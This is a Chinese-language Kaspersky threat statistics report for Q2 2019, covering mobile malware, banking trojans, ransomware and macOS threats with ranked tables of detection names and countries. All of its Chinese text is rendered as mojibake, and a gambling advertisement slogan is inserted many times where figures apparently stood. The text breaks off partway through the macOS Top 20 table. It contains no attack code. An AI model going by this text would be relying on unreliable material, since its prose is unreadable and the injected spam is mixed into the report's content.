¿¨°Í˹»ù2019ÄêQ2 ITÍþвÑݱäͳ¼Æ±¨¸æ

Ðû²¼Ê±¼ä 2019-09-05

Ŀ¼



Ò»¡¢¼¾¶ÈÊý×Ö

¶þ¡¢Òƶ¯Íþв

    2.1 ¼¾¶ÈÁÁµã

     2.2 ÒÆ¶¯Íþвͳ¼Æ

    2.3 ÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÂþÑÜ

    2.4 ÒÆ¶¯¶ñÒâÈí¼þTop20

    2.5 ÒÆ¶¯ÍþвµÄµØÀíÂþÑÜ

         2.5.1 Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¼ÒTop 10

     2.6 ÒøÐÐľÂí

         2.6.1 ÊÜÒøÐÐľÂí¹¥»÷±ÈÀý×î¸ßµÄ¹ú¼ÒTop10

    2.7 ÀÕË÷Èí¼þ

         2.7.1 ÒÆ¶¯ÀÕË÷Èí¼þTop10

Èý¡¢macOSÍþв

     3.1 macOSÍþвTop20

     3.2 µØÀíÂþÑÜ

ËÄ¡¢ÎïÁªÍøÍþв

     4.1 Í·ÌõÊÂÎñ

     4.2 ÎïÁªÍøÍþвͳ¼Æ

    4.3 »ùÓÚTelnetµÄ¹¥»÷

         4.3.1 Telnet¹¥»÷ȪԴµÄ¹ú¼ÒÂþÑÜTop10

         4.3.2 Telnet¹¥»÷ÖÐÏÂÔØµÄ¶ñÒâÈí¼þTop10

    4.4 »ùÓÚSSHµÄ¹¥»÷

         4.4.1 SSH¹¥»÷ȪԴµÄ¹ú¼ÒÂþÑÜTop10

Îå¡¢½ðÈÚÍþв

    5.1 ½ðÈÚÍþвͳ¼Æ 

    5.2 µØÀíÂþÑÜ

         5.2.1 Êܹ¥»÷Óû§µÄ¹ú¼ÒÂþÑÜTop10

         5.2.2 ÒøÐжñÒâÈí¼þ¼Ò×åTop10

Áù¡¢ÀÕË÷Èí¼þ

    6.1 ¼¾¶ÈÁÁµã

     6.2 бäÖÖÊýÄ¿

    6.3 Êܹ¥»÷Óû§ÊýÄ¿

    6.4 µØÀíÂþÑÜ

        6.4.1 Êܹ¥»÷Óû§µÄ¹ú¼ÒÂþÑÜTop 10

    6.5 ÀÕË÷Èí¼þTop10

Æß¡¢¶ñÒâ¿ó¹¤

    7.1 бäÖÖµÄÊýÄ¿

    7.2 Êܹ¥»÷Óû§ÊýÄ¿

    7.3 µØÀíÂþÑÜ

°Ë¡¢·¸·¨·Ö×ÓÖØµã¹Ø×¢µÄųÈõÓ¦ÓÃ

    8.1 ͨ¹ýÍøÂç×ÊÔ´ÌᳫµÄ¹¥»÷

         8.1.1 ÍøÂç¹¥»÷ȪԴ¹ú¼ÒµÄTop10

         8.1.2 Óû§Ñ¬È¾Î£º¦×î¸ßµÄ¹ú¼Ò

    8.2 ÍâµØÍþв

         8.2.2 ÍâµØÑ¬È¾Î£º¦×î¸ßµÄ¹ú¼Ò





Ò»¡¢¼¾¶ÈÊý×Ö


__
__


ƾ֤KSNµÄÊý¾Ý£º


  • ¿¨°Í˹»ùÇå¾²½â¾ö¼Æ»®×èÖ¹ÁËÈ«Çò203¸ö¹ú¼ÒµÄÔÚÏß×ÊÔ´ÌᳫµÄ717,057,912´Î¹¥»÷

  • Web·´²¡¶¾×é¼þ¼ì²âµ½217,843,293¸ö²î±ðµÄ¶ñÒâURL

  • ÔÚ228,206¸öÓû§µÄµçÄÔÉϼͼµ½Õë¶ÔÔÚÏßÒøÐÐÕË»§µÄ¶ñÒâÈí¼þѬȾÊÂÎñ

  • ÔÚ232,292¸öÓû§µÄµçÄÔÉÏ×èÖ¹ÁËÀÕË÷Èí¼þ¹¥»÷

  • Îļþ·´²¡¶¾ÏµÍ³¼ì²âµ½240,754,063¸ö²î±ðµÄ¶ñÒ⼰DZÔÚÓк¦Ñù±¾

  • ¿¨°Í˹»ùÒÆ¶¯Çå¾²²úÆ·¼ì²âµ½£º

    • 753,550¸ö¶ñÒâ×°Öðü

    • 13,899¸öÒøÐÐľÂí×°Öðü

    • 23,294¸öÀÕË÷Èí¼þ×°Öðü



¶þ¡¢Òƶ¯Íþв


__
__


2.1 ¼¾¶ÈÁÁµã


2019ÄêQ2Óм¸¸öÊÂÎñÖµµÃÃú¿Ì¡£


µÚÒ»¸öÊÇ£¬ÃûΪRiltokµÄ´ó¹æÄ£½ðÈÚÍþв£¬Ëü²»µ«Õë¶Ô¶íÂÞ˹´óÐÍÒøÐеĿͻ§£¬»¹Ãé׼һЩÍâ¹úÒøÐеÄÓû§¡£


µÚ¶þ¸ö£¬Ð¶ñÒâÈí¼þTrojan.AndroidOS.MobOk£¬ÆäÄ¿µÄÊÇͨ¹ýWAP-Click¸¶·Ñ¶©ÔÄ´ÓÊÖ»úÕÊ»§ÖÐÇÔÈ¡×ʽð¡£ÊÜѬȾװ±¸»á½øÈëÍøÂç¹ýÔØ×´Ì¬¡£ÏêϸÀ´Ëµ£¬¸ÃľÂí»á»á¼ûרÃŽ¨ÉèµÄ¶ñÒâÒ³Ãæ£¬Ê¹ÓõÚÈý·½·þÎñÈÆ¹ýÑéÖ¤Âëϵͳ²¢µã»÷°´Å¥Íê³É¶©ÔÄ¡£


µÚÈý¸ö£¬ÉÌÒµÌØ¹¤Èí¼þ£¬ÓÖ±»³ÆÎª¸ú×ÙÈí¼þ£¨stalkerware£©£¬Í¨³£À´½²´ËÀàÈí¼þ²¢²»¿É±»¹éÀàΪ¶ñÒâÈí¼þ£¬µ«Ëüȷʵ»á¸øÓû§´øÀ´Î£º¦¡£Òò´Ë´Ó4ÔÂ3ÈÕ×îÏÈ£¬¿¨°Í˹»ùAndroidÇå¾²Èí¼þ»áÏòÓû§ÖÒÑÔËùÓÐÒÑÖªµÄÉÌÒµÌØ¹¤Èí¼þ¡£


µÚËĸö£¬Ò»ÖÖÐÂÀàÐÍµÄ¹ã¸æÈí¼þ£¨AdWare.AndroidOS.KeepMusic.aºÍAdWare.AndroidOS.KeepMusic.b£©£¬Ëü¿ÉÒÔÈÆ¹ý²Ù×÷ϵͳ¶Ôºǫ́ÔËÐгÌÐòµÄÏÞÖÆ¡£ÎªÁ˱ÜÃâÀú³Ì±»É±ËÀ£¬ÆäÖÐÒ»¸öÑù±¾ÔÚºǫ́Æô¶¯ÁËÒôÀÖ²¥·ÅÆ÷£¬²¥·ÅÒ»¸öÎÞÉùµÄÎļþ£¬Ê¹µÃ²Ù×÷ϵͳÒÔΪÓû§ÔÚÌýÒôÀÖ¶ø²»É±ËÀÆäÀú³Ì£¬ÏÖʵÉÏÔÚ×°±¸µÄÖ÷ÆÁÄ»ÉÏʲôҲûÓÐÏÔʾ¡£×÷Ϊ½©Ê¬ÍøÂçµÄÒ»²¿·Ö£¬¸ÃÑù±¾»áÏòÓû§µ¯³ö¹ã¸æ£¬ÏÖʵÉÏÕâЩ¹ã¸æÒ²ÊÇÔÚºǫ́µ¯³ö£¬Óû§´Ëʱ¿ÉÄÜ»ù´¡Ã»ÓÐʹÓÃ×°±¸¡£


µÚÎå¸ö£¬Ä¾Âí¼Ò×åHideapp£¬ÕâЩľÂíÔÚQ2Æð¾¢Èö²¥£¬²¢ÇÒ°üÀ¨¾Ã¾­Ä¥Á·µÄ·Ö·¢»úÖÆ£º½ÓÄÉɱ¶¾Èí¼þµÄlogoÒÔ¼°Î±×°³ÉÉ«ÇéAPP¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!



×îºó£¬ÔÚijЩ°æ±¾ÖУ¬Ä¾Âí¿ª·¢Ö°Ô±Ïò¶íÂÞ˹×î´óµÄIT¹«Ë¾Ö®Ò»µÄÖÎÀíÕßÃDZí´ïÁ˲»ÓÑÉÆµÄ̬¶È£º


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2.2 ÒÆ¶¯Íþвͳ¼Æ


2019ÄêQ2¿¨°Í˹»ù¹²¼ì²âµ½753,550¸ö¶ñÒâ×°Öðü£¬±ÈÉÏÒ»¼¾¶ÈïÔÌ­ÁË151,624¸ö¡£



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2018ÄêQ3 ¨C 2019ÄêQ2£¬¶ñÒâ×°ÖðüµÄÊýÄ¿±ÈÕÕ



²¢ÇÒ£¬Óë2018ÄêQ2µÄÊý¾ÝÏà±ÈÕâÒ»Êý×ÖÒѾ­Ï½µÁ˽ü100Íò¡£ÕûÌå¿´À´£¬½ñÄêÒÆ¶¯Æ½Ì¨Ð¶ñÒâÈí¼þµÄ×ÜÊýÎȲ½Ï½µ£¬ÕâÖÖϽµÊÇÓÉÓÚ×î³£¼ûµÄ¶ñÒâÈí¼þ¼Ò×åÔ½À´Ô½ÉÙµØÌí¼ÓгÉÔ±ËùÖ¡£


2.3 ÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÂþÑÜ


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ1ºÍQ2£¬ÐÂÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÂþÑÜ



ÔÚ2019ÄêQ2¼ì²âµ½µÄËùÓÐÍþвÖУ¬Õ¼±È×î¸ßµÄÊÇDZÔÚÓк¦µÄ»ÒÉ«Èí¼þ£¨RiskTool£©£¬Æä·Ý¶îΪ41.24%£¬±ÈÉÏÒ»¼¾¶ÈÔöÌíÁË11¸ö°Ù·Öµã¡£ÔÚ¸ÃÖÖ±ðÖУ¬×î³£¼ûµÄÑùÔ­À´×ÔÓÚRiskTool.AndroidOS.Agent¼Ò×壨ռ¸ÃÀà±ðµÄ33.07%£©£¬RiskTool.AndroidOS.Smssend£¨15.68%£©ºÍRiskTool.AndroidOS.Wapron£¨14.41%£©¡£


ÅÅÔÚµÚ¶þÃûµÄÊÇ¹ã¸æÈí¼þ£¬Æä·Ý¶îÔöÌíÁË2.16¸ö°Ù·Öµã£¬´ï18.71%¡£¸ÃÖÖ±ðÖÐ×î³£¼ûµÄÑùÌìÖ°±ðÊÇAdWare.AndroidOS.Ewind£¨26.46%£©¡¢AdWare.AndroidOS.Agent£¨23.60%£©ºÍAdWare.AndroidOS.MobiDash£¨17.39%£©¡£


ľÂíÀà¶ñÒâÈí¼þ£¨11.83%£©ÅÅÃûµÚÈý£¬ÓëÉÏÒ»¼¾¶ÈÏà±ÈÔöÌíÁË2.31¸ö°Ù·Öµã¡£¸ÃÖÖ±ðÑù±¾Êý×î¶àµÄÊÇTrojan.AndroidOS.Boogr¼Ò×壨32.42%£© - ÕâÒ»Ãû³Æ´úÖ¸»úеѧϰ¹¤¾ß¼ì²âµ½µÄľÂí¡£Æä´ÎÊÇTrojan.AndroidOS.Hiddapp£¨24.18%£©¡¢Trojan.AndroidOS.Agent£¨14.58%£©ºÍTrojan.AndroidOS.Piom£¨9.73%£©¡£Çë×¢ÖØAgentºÍPiomÊÇÜöÝÍÀàµÄÌØÕ÷£¬º­¸ÇÁ˲î±ð¿ª·¢ÕßµÄһϵÁÐľÂíÑù±¾¡£


ľÂíÊÍ·ÅÆ÷£¨Trojan-Dropper£©ÖÖ±ðÏ»¬ÏÔ×Å£¨10.04%£©£¬Ï½µÁË15¸ö°Ù·Öµã¡£¸ÃÖÖ±ðÖдó´ó¶¼Ñù±¾ÊôÓÚTrojan-Dropper.AndroidOS.Wapnor¼Ò×壨71%£©£¬ÆäËü¼Ò×åµÄ·Ý¶î¾ùСÓÚ3%¡£Ò»¸öµä·¶µÄWapnor¼Ò×å³ÉÔ±ÓÉÒ»ÕÅËæ»úµÄÉ«ÇéͼƬ¡¢Ò»¸ö¶à̬ÐÔdropperÒÔ¼°Ò»¸ö¿ÉÖ´ÐÐÎļþ×é³É¡£¸Ã¶ñÒâÈí¼þµÄʹÃüÊÇÈ¡´úÓû§¾ÙÐÐWAP¸¶·Ñ¶©ÔÄ¡£


2019ÄêQ2ÒøÐÐľÂí£¨banker£©µÄ·Ý¶îÉÔ΢Ͻµ£º1.84%£¬¶øQ1Ϊ3.21%¡£ÕâһϽµÖ÷ÒªÊÇÓÉÓÚAsacub¼Ò×åÐÂľÂíµÄïÔÌ­ËùÖ¡£¸ÃÖÖ±ð×î³£¼ûµÄÑù±¾ÊôÓÚTrojan-Banker.AndroidOS.Svpeng £¨30.79%£©¡¢Trojan-Banker.AndroidOS.Wroba£¨17.16%£©ºÍTrojan-Banker.AndroidOS.Agent£¨15.70%£©¡£


2.4 ÒÆ¶¯¶ñÒâÈí¼þTop20


Çë×¢ÖØÅÅÃûÖв»°üÀ¨ÈκÎDZÔÚΣÏÕ»òÓꦵÄÈí¼þ£¬ÀýÈç»ÒÉ«Èí¼þºÍ¹ã¸æÈí¼þ


                               ÌØÕ÷                                                                                                %*

1

DangerousObject.Multi.Generic

44.37

2

Trojan.AndroidOS.Boogr.gsh

11.31

3

DangerousObject.AndroidOS.GenericML

5.66

4

Trojan.AndroidOS.Hiddapp.cr

4.77

5

Trojan.AndroidOS.Hiddapp.ch

4.17

6

Trojan.AndroidOS.Hiddapp.cf

2.81

7

Trojan.AndroidOS.Hiddad.em

2.53

8

Trojan-Dropper.AndroidOS.Lezok.p

2.16

9

Trojan-Dropper.AndroidOS.Hqwar.bb

2.08

10

Trojan-Banker.AndroidOS.Asacub.a

1.93

11

Trojan-Banker.AndroidOS.Asacub.snt

1.92

12

Trojan-Banker.AndroidOS.Svpeng.ak

1.91

13

Trojan.AndroidOS.Hiddapp.cg

1.89

14

Trojan.AndroidOS.Dvmap.a

1.88

15

Trojan-Dropper.AndroidOS.Hqwar.gen

1.86

16

Trojan.AndroidOS.Agent.rt

1.81

17

Trojan-SMS.AndroidOS.Prizmes.a

1.58

18

Trojan.AndroidOS.Fakeapp.bt

1.58

19

Trojan.AndroidOS.Agent.eb

1.49

20

Exploit.AndroidOS.Lotoor.be

1.46

*Êܹ¥»÷Óû§Õ¼±È

ÓëÒÔǰһÑù£¬Q2ÖÐTop20µÄµÚÒ»ÃûÊÇDangerousObject.Multi.Generic£¨44.77%£© - ÕâÒ»ÌØÕ÷´úÖ¸ÔÆÇå¾²ÊÖÒÕ¼ì²âµ½µÄ¶ñÒâÈí¼þ¡£µ±É±¶¾Èí¼þÊý¾Ý¿âȱÉÙ¼ì²âijһÀà¶ñÒâÈí¼þµÄÊý¾Ý¶øÔÆÇå¾²ÊÖÒÕÖаüÀ¨Ïà¹ØÐÅϢʱ£¬¸ÃÊÖÒÕµÄ×÷ÓþÍ͹ÏÔ³öÀ´¡£»ù±¾ÉÏ×îеĶñÒâÑù±¾¶¼ÊÇÕâÑù¼ì²â³öÀ´µÄ¡£


µÚ¶þºÍµÚÈýÃû»®·ÖÊÇTrojan.AndroidOS.Boogr.gsh£¨11.31%£©ºÍDangerousObject.AndroidOS.GenericML£¨5.66%£©¡£ÕâЩÊÇÓÉ»úеѧϰϵͳ¼ì²â³öµÄ¶ñÒâÑù±¾¡£


µÚËÄ¡¢µÚÎå¡¢µÚÁù¡¢µÚÆßºÍµÚÊ®ÈýÃû¾ùÓÉTrojan.AndroidOS.Hiddapp¼Ò×åµÄ³ÉÔ±»ñµÃ¡£¸ÃľÂí¼Ò×åµÄÖ÷ҪʹÃüÊÇÉñÃØ¼ÓÔØ¹ã¸æ£¬ÈôÊÇÓû§¼ì²âµ½Ëü£¬Ëü²»»á×èÖ¹Óû§¾ÙÐÐɾ³ý£¬µ«Ò»ÓÐʱ»ú¾Í»áÖØÐÂ×°Öá£

µÚ°ËÃûÊôÓÚTrojan-Dropper.AndroidOS.Lezok.p£¨2.16%£©¡£¸ÃľÂí»áÏÔʾÍç¹ÌÐÍ¹ã¸æ£¬Í¨¹ý¶ÌП¶·Ñ¶©ÔÄÇÔÈ¡¿î×ÓÒÔ¼°ÎªÖÖÖÖÆ½Ì¨ÉϵÄAPPÔöÌíµã»÷Êý¡£


Hqwar dropper¼Ò×å»®·Ö»ñµÃµÚ¾Å£¨2.08%£©ºÍµÚÊ®ÎåÃû£¨1.86%£©¡£¸Ã¶ñÒâÈí¼þͨ³£ÓÃÓÚÒþ²ØÒøÐÐľÂí¡£


µÚÊ®ºÍʮһÃûÊǽðÈÚÍþвAsacub¼Ò×壺Trojan-Banker.AndroidOS.Asacub.a£¨1.93%£©ºÍTrojan-Banker.AndroidOS.Asacub.snt£¨1.92%£©¡£ÓëHqwar dropperÀàËÆ£¬¸Ã¼Ò×åÔÚ2019ÄêQ2ɥʧÁË´óÆ¬·Ý¶î¡£


2.5 ÒÆ¶¯ÍþвµÄµØÀíÂþÑÜ


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬Òƶ¯¶ñÒâÈí¼þѬȾµÄµØÀíÂþÑÜ




2.5.1 Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¼ÒTop 10


                        ¹ú¼Ò*                                                               %**

1

ÒÁÀÊ

28.31

2

ÃϼÓÀ­¹ú

28.10

3

°¢¶û¼°ÀûÑÇ

24.77

4

°Í»ù˹̹

24.00

5

̹ɣÄáÑÇ

23.07

6

ÄáÈÕÀûÑÇ

22.69

7

Ó¡¶È

21.65

8

Ó¡¶ÈÄáÎ÷ÑÇ

18.13

9

˹ÀïÀ¼¿¨

15.96

10

¿ÏÄáÑÇ

15.38

* ²»°üÀ¨¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊܹ¥»÷µÄ±ÈÀý



Q2Êܹ¥»÷ÒÆ¶¯Óû§±ÈÀý×î¸ßµÄ¹ú¼ÒÊÇÒÁÀÊ£¨28.31%£©£¬ÔÚ2019ÄêQ1ËüÅÅÔÚµÚ¶þ¡£±»ËüÈ¡´úµÄ°Í»ù˹̹£¨24%£©ÏÖÔÚÅÅÔÚµÚËÄ¡£


´ó´ó¶¼ÇéÐÎÏ£¬ÒÁÀÊÓû§Óöµ½µÄ¹ã¸æÄ¾ÂíÊÇTrojan.AndroidOS.Hiddapp.bn£¨21.08%£©ºÍDZÔÚÓк¦Èí¼þRiskTool.AndroidOS.FakGram.a£¨12.50%£© - ¸ÃÈí¼þÊÔͼ×èµ²Telegram̸ÌìÐÅÏ¢ ¨C ÒÔ¼°RiskTool.AndroidOS.Dnotua.yfe£¨12.29%£©¡£


ÀàËÆÓÚÒÁÀÊ£¬ÃϼÓÀ­¹ú£¨28.10%£©µÄÅÅÃûÅÊÉýÁËһλ¡£´ó´ó¶¼ÇéÐÎÏ£¬ÃϼÓÀ­¹úµÄÓû§Óöµ½µÄÊÇÖÖÖÖ¹ã¸æÈí¼þ£¬°üÀ¨AdWare.AndroidOS.Agent.f£¨35.68%£©¡¢AdWare.AndroidOS.HiddenAd.et£¨14.88%£©ºÍAdWare.AndroidOS.Ewind.h£¨9.65%£©¡£


µÚÈýÃûÊǰ¢¶û¼°ÀûÑÇ£¨24.77%£©£¬¸Ã¹ú¼ÒÓû§×î³£Óöµ½µÄÊÇ¹ã¸æÈí¼þAdWare.AndroidOS.HiddenAd.et£¨27.15%£©¡¢AdWare.AndroidOS.Agent.f£¨14.16%£©ºÍAdWare.AndroidOS.Oimobi.a£¨8.04%£©¡£


2.6 ÒøÐÐľÂí


ÔÚ±¨¸æÆÚÄÚ£¬ÎÒÃǹ²¼ì²âµ½13,899¸öÒÆ¶¯ÒøÐÐľÂí×°Öðü£¬ÏÕЩÊÇ2019ÄêQ1Êý×ÖµÄÒ»°ë¡£


ÆäÖÐSvpengľÂí¼Ò×åµÄТ˳×î´ó£ºÕ¼ËùÓÐÒøÐÐľÂíµÄ30.79%¡£Trojan-Banker.AndroidOS.Wroba£¨17.16%£©ºÍTrojan-Banker.AndroidOS.Agent£¨15.70%£©ÅÅÁеڶþµÚÈý¡£ÃûÉùÔÚÍâµÄAsacubľÂí£¨11.98£¥£©Ö»»ñµÃÁ˵ÚÎåÃû¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2018ÄêQ3 ¨C 2019ÄêQ2£¬ÒøÐÐľÂí×°ÖðüµÄÊýÄ¿±ÈÕÕ


ÒÆ¶¯ÒøÐÐľÂíTop 10


                              ÌØÕ÷                                                                                  %*

1

Trojan-Banker.AndroidOS.Asacub.a

13.64

2

Trojan-Banker.AndroidOS.Asacub.snt

13.61

3

Trojan-Banker.AndroidOS.Svpeng.ak

13.51

4

Trojan-Banker.AndroidOS.Svpeng.q

9.90

5

Trojan-Banker.AndroidOS.Agent.ep

9.37

6

Trojan-Banker.AndroidOS.Asacub.ce

7.75

7

Trojan-Banker.AndroidOS.Faketoken.q

4.18

8

Trojan-Banker.AndroidOS.Asacub.cs

4.18

9

Trojan-Banker.AndroidOS.Agent.eq

3.81

10

Trojan-Banker.AndroidOS.Faketoken.z

3.13

* Êܹ¥»÷Óû§°Ù·Ö±È



2019ÄêQ2ÒÆ¶¯ÒøÐÐľÂíTop10ÁбíÖÐTrojan-Banker.AndroidOS.AsacubµÄ±äÖÖÏÕЩռÓÐÁËÒ»°ëµÄλÖãºÊ®Ï¯Ö®ÖÐÕ¼ÓÐÁËËÄϯ¡£È»¶ø£¬¸Ã¼Ò×åÉÏÒ»¼¾¶ÈµÄ±¬·¢Ê½Èö²¥ÔÚÕâÒ»¼¾¶È²¢Ã»ÓÐÖØÏÖ¡£


ͬQ1Ò»Ñù£¬Trojan-Banker.AndroidOS.Agent.eqºÍTrojan-Banker.AndroidOS.Agent.epÀֳɽøÈëǰʮ£»È»¶ø£¬ËüÃÇÈ´½«Ç°ÅÅϯλÈøøÁ˾ݳÆÊÇ×î¹ÅÀÏľÂí¼Ò×åµÄSvpeng¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬Òƶ¯ÒøÐÐľÂíµÄµØÀíÂþÑÜ



2.6.1 ÊÜÒøÐÐľÂí¹¥»÷±ÈÀý×î¸ßµÄ¹ú¼ÒTop10


                  ¹ú¼Ò*                                                                                   %**

1

ÄÏ·Ç

0.64%

2

¶íÂÞ˹

0.31%

3

Ëþ¼ª¿Ë˹̹

0.21%

4

°Ä´óÀûÑÇ

0.17%

5

ÍÁ¶úÆä

0.17%

6

ÎÚ¿ËÀ¼

0.13%

7

ÎÚ×ȱð¿Ë˹̹

0.11%

8

º«¹ú

0.11%

9

ÑÇÃÀÄáÑÇ

0.10%

10

Ó¡¶È

0.10%

* ²»°üÀ¨¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊÜÒøÐÐľÂí¹¥»÷µÄ±ÈÀý



2019ÄêQ2ÄÏ·Ç£¨0.64%£©´ÓÉÏÒ»¼¾¶ÈµÄµÚËÄÃûÅÊÉýÖÁµÚһλ¡£¸Ã¹ú¼Ò97%µÄ¹¥»÷°¸Àý¶¼ÓëTrojan-Banker.AndroidOS.Agent.dxÓйØ¡£


¶íÂÞ˹ժµÃµÚ¶þÃû£¨0.31%£©£¬¸Ã¹ú¼Ò×î³£¼ûµÄľÂí¼Ò×åÊÇAsacubºÍSvpeng£ºTrojan-Banker.AndroidOS.Asacub.a£¨14.03%£©¡¢Trojan-Banker.AndroidOS.Asacub.snt£¨13.96%£©ºÍTrojan-Banker.AndroidOS.Svpeng.ak£¨13.95%£©¡£


µÚÈýÃûÊôÓÚËþ¼ª¿Ë˹̹£¨0.21%£©£¬×î³£¼ûµÄÊÇTrojan-Banker.AndroidOS.Faketoken.z£¨35.96%£©¡¢Trojan-Banker.AndroidOS.Asacub.a£¨12.92%£©ºÍTrojan- Banker.AndroidOS.Grapereh.j£¨11.80%£©¡£


2.7 ÀÕË÷Èí¼þ


2019ÄêQ2ÎÒÃǹ²¼ì²âµ½23,294¸öÒÆ¶¯ÀÕË÷Èí¼þ×°Öðü£¬±ÈÉÏÒ»¼¾¶ÈïÔÌ­ÁË4,634¸ö¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2018ÄêQ3 ¨C 2019ÄêQ2£¬Òƶ¯ÀÕË÷Èí¼þ×°ÖðüµÄÊýÄ¿±ÈÕÕ


2.7.1 ÒÆ¶¯ÀÕË÷Èí¼þTop10


                       ÌØÕ÷                                                                           %*

1

Trojan-Ransom.AndroidOS.Svpeng.aj

43.90

2

Trojan-Ransom.AndroidOS.Rkor.i

11.26

3

Trojan-Ransom.AndroidOS.Rkor.h

7.81

4

Trojan-Ransom.AndroidOS.Small.as

6.41

5

Trojan-Ransom.AndroidOS.Svpeng.ah

5.92

6

Trojan-Ransom.AndroidOS.Svpeng.ai

3.35

7

Trojan-Ransom.AndroidOS.Fusob.h

2.48

8

Trojan-Ransom.AndroidOS.Small.o

2.46

9

Trojan-Ransom.AndroidOS.Pigetrl.a

2.45

10

Trojan-Ransom.AndroidOS.Small.ce

2.22

* Êܹ¥»÷Óû§°Ù·Ö±È



2019ÄêQ2Èö²¥×îÆÕ±éµÄÀÕË÷Èí¼þ¼Ò×åÊÇSvpeng£ºÕ¼ÓÐÁËTop10ÖеÄ3ϯ¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2ÒÆ¶¯ÀÕË÷Èí¼þµÄµØÀíÂþÑÜ



2.7.2 ÊÜÀÕË÷Èí¼þ¹¥»÷±ÈÀý×î¸ßµÄ¹ú¼ÒTop10


                         ¹ú¼Ò*                                                     %**

1

ÃÀ¹ú

1.58

2

¹þÈø¿Ë˹̹

0.39

3

ÒÁÀÊ

0.27

4

°Í»ù˹̹

0.16

5

É³ÌØ°¢À­²®

0.10

6

Ä«Î÷¸ç

0.09

7

¼ÓÄôó

0.07

8

Òâ´óÀû

0.07

9

ÐÂ¼ÓÆÂ

0.05

10

Ó¡¶ÈÄáÎ÷ÑÇ

0.05

* ²»°üÀ¨¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊÜÒÆ¶¯ÀÕË÷Èí¼þ¹¥»÷µÄ±ÈÀý


ÓëÉÏÒ»¼¾¶ÈÒ»Ñù£¬Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¼ÒÒÀ´ÎÊÇÃÀ¹ú£¨1.58%£©¡¢¹þÈø¿Ë˹̹£¨0.39%£©ºÍÒÁÀÊ£¨0.27%£©¡£

Èý¡¢macOSÍþв

__


Q2¼ûÖ¤Á˼¸¸öÓÐȤµÄÊÂÎñ£¬ÆäÖÐÓÐÈý¸öÌØÊâÖµµÃ¹Ø×¢¡£


Ê×ÏÈÊÇmacOSϵͳÖÐÆØ³öÒ»¸ö¿ÉÈÆ¹ýGatekeeperºÍXProtectɨÃèµÄÎó²î¡£Ê¹ÓøÃÎó²îÐèÒªÊ×ÏȽ¨ÉèÒ»¸ö´æµµÎļþ£¬ÎļþÖаüÀ¨Ö¸ÏòÎļþËùÔڵĹ²ÏíNFSÎļþ¼ÐµÄ·ûºÅÁ´½Ó¡£µ±·­¿ª¸ÃÎļþʱ£¬ÏµÍ³»á×Ô¶¯ÏÂÔØ¸Ã¹²ÏíNFSÎļþ¼ÐÖеÄÎļþ£¬¶øÃ»ÓоÙÐÐÈκμì²é¡£Ê¹ÓøÃÎó²îµÄÊ׸ö¶ñÒâÈí¼þºÜ¿ìÏÖÉí£»µ«ËùÓеļì²âÑù±¾¿´ÆðÀ´¶¼¸üÏñÊÇÒ»¸ö²âÊ԰棬¶ø²»ÊÇÏÖʵµÄ¶ñÒâÈí¼þ¡£


Æä´ÎÊÇÔÚFirefoxä¯ÀÀÆ÷Öмì²âµ½µÄí§Òâ´úÂëÖ´ÐÐÎó²î£¨CVE-2019-11707£¬CVE-2019-11708£©£¬ÕâÁ½¸öÎó²î¿Éµ¼ÖÂɳºÐÌÓÒÝ¡£ÔÚÐÅÏ¢¹ûÕæºó£¬Ê׸öexpºÜ¿ì·ºÆð£¬·¸·¨·Ö×ÓʹÓÃÕâЩÎó²îÊÍ·ÅľÂí¼Ò×åMokesºÍWirenetµÄ³ÉÔ±¡£


×îºóÊÇÒ»¸ö·Ö·¢¶ñÒâ¿ó¹¤µÄÓÐÈ¤ÔØÌå¡£¹¥»÷ÕßÖ÷ҪʹÓÃÉç½»¹¤³Ì¹¥»÷ºÍÔÚÕýµ±APPÖÐÖ²Èë¶ñÒâ´úÂë¡£¸üΪÓÐȤµÄÊÇ£¬¶ñÒâ´úÂëÊÇÓÉÒ»¸öQEMUÄ£ÄâÆ÷ºÍÒ»¸öÓÃÓÚÍйܿ󹤵ÄLinuxÐéÄâ»ú×é³ÉµÄ¡£Ò»µ©QEMUÔÚÊÜѬȾµÄ»úеÉÏÆô¶¯£¬¿ó¹¤¼´ÔÚ¾µÏñÖÐÔËÐС£ÕâÖÖģʽÏ൱ÀëÆæ ¨C ÎÞÂÛÊÇQEMUÕվɿ󹤶¼ÏûºÄÁË´ó×Úϵͳ×ÊÔ´ ¨C ÕâÖÖľÂí²»¿ÉÄܲ»±»ÈË·¢Ã÷¡£


3.1 macOSÍþвTop20



                ÌØÕ÷                                                                          %*

1

Trojan-Downloader.OSX.Shlayer.a

24.61

2

AdWare.OSX.Spc.a

12.75

3

AdWare.OSX.Bnodlero.t

11.98

4

AdWare.OSX.Pirrit.j

11.27

5

AdWare.OSX.Pirrit.p

8.42

6

AdWare.OSX.Pirrit.s
